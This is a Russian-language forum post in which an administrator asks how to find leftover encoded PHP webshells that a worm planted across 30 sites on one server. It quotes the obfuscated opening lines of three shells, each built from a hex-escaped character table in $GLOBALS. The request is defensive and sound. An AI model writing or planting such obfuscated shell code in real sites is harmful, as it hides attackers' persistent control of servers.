Всех приветствую.
На одном из серверов завелся червь. Среди 30 сайтов залито куча шелов. Само собой все закодированы.
Основную массу удалось удалить. Но остались некоторые и как их отыскать через:
find / -name '*.php'
не могу придумать.
В основном их содержание следующее:
<?php $GLOBALS['vb57'] = "\x73\x63\x64\x78\x2b\x2a\x27\x40\x79\x21\x56\x37\x24\x72\x65\x36\x50\x69\x68\x66\x70\x75\x57\x6b\x4a\x23\x20\x7b\x6f\x4b\x5d\x5c\x3a\x3b\x53\x6c\x34\x30\x6d\x52\x4e\x5f\x31\x7e\x39\x67\x7c\x44\x38\x3d\x46\x3f\x49\x48\x47\x22\x43\x2f\x28\x5b\x33\x42\x3e\x2e\x45\x77\x60\x55\x35\x25\x26\x62\x6e\x3c\x61\x71\x4f\x9\x51\x74\x5a\x59\x54\x7a\x32\x6a\x76\x4d\xd\x29\x4c\x5e\x2d\x2c\x41\x7d\xa\x58";
$GLOBALS[$GLOBALS['vb57'][28].$GLOBALS['vb57'][48].$GLOBALS['vb57'][42].$GLOBALS['vb57'][42].$GLOBALS['vb57'][14].$GLOBALS['vb57'][11].$GLOBALS['vb57'][1].$GLOBALS['vb57'][11]] = $GLOBALS['vb57'][1].$GLOBALS['vb57'][18].$GLOBALS['vb57'][13];
<?php $GLOBALS['m98e70c'] = "\x4d\x73\x54\x62\x2b\x7e\x75\x29\x2c\x2a\x22\x33\x46\x23\x39\x48\x49\x47\x56\x44\x36\x7d\x57\x51\x41\x28\x64\x50\x3a\x3f\x35\x6e\x4e\x53\x5e\x63\x66\x7c\x67\x2e\x60\xd\x7a\x69\x76\x4a\x65\x3c\x59\x58\x9\x6d\x34\x37\x77\x30\x4f\x45\x32\x40\x5d\x26\x4c\x24\x4b\x43\x25\x72\x3e\x5a\x52\xa\x3b\x42\x27\x74\x70\x2d\x71\x38\x7b\x61\x20\x6a\x79\x5c\x6f\x6b\x3d\x21\x6c\x5f\x68\x2f\x55\x5b\x31\x78";
$GLOBALS[$GLOBALS['m98e70c'][76].$GLOBALS['m98e70c'][11].$GLOBALS['m98e70c'][52].$GLOBALS['m98e70c'][30].$GLOBALS['m98e70c'][96]] = $GLOBALS['m98e70c'][35].$GLOBALS['m98e70c'][92].$GLOBALS['m98e70c'][67];
$GLOBALS[$GLOBALS['m98e70c'][26].$GLOBALS['m98e70c'][53].$GLOBALS['m98e70c'][81].$GLOBALS['m98e70c'][35].$GLOBALS['m98e70c'][52].$GLOBALS['m98e70c'][79].$GLOBALS['m98e70c'][46].$GLOBALS['m98e70c'][35]] = $GLOBALS['m98e70c'][86].$GLOBALS['m98e70c'][67].$GLOBALS['m98e70c'][26];
<?php $GLOBALS['zc0aea'] = "\x22\x3c\x4a\x7d\x3a\x5c\x7b\x54\x6c\x53\x3f\x29\x38\x4e\x2b\x31\x4d\x3d\x6b\x67\x9\x75\x55\x59\x2c\x7e\x56\x47\x2a\x34\x5b\x6e\x62\x4b\x24\x7c\x58\x2d\x63\x57\x65\x68\x37\x21\x2f\x26\x28\x79\x46\x50\x6d\x30\x51\x4c\x69\x35\x70\x25\x52\x33\x48\x27\x60\x61\x66\x36\x73\x5f\x39\x5d\x20\x5e\xd\x42\x49\x43\x6a\x41\x76\x5a\x7a\x3b\x4f\x2e\x45\x74\x3e\x44\x78\x72\xa\x23\x40\x32\x64\x77\x71\x6f";
$GLOBALS[$GLOBALS['zc0aea'][54].$GLOBALS['zc0aea'][12].$GLOBALS['zc0aea'][55].$GLOBALS['zc0aea'][59].$GLOBALS['zc0aea'][12].$GLOBALS['zc0aea'][68].$GLOBALS['zc0aea'][65]] = $GLOBALS['zc0aea'][38].$GLOBALS['zc0aea'][41].$GLOBALS['zc0aea'][89];
Буду признателен за подсказку.
